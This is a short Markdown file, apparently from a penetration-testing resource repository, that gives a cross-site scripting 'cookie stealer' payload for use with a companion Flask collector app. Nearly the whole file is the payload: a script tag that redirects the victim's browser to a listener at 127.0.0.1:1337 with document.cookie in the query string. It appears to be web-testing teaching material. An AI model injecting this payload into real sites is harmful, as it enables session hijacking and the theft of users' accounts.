cyber-security-resources/web_application_testing/cookie_stealer_payload.md

7 lines
315 B
Markdown
Raw Normal View History

2021-03-27 16:44:42 +00:00
# Cookie Stealer Payload
This is the payload that can be used with the [cookie stealer Python/Flask app](https://github.com/The-Art-of-Hacking/h4cker/blob/master/python_ruby_and_bash/cookie_stealer.py).
```
2021-03-27 19:48:22 +00:00
<script type="text/javascript">document.location="http://127.0.0.1:1337/?c="+document.cookie;</script>
```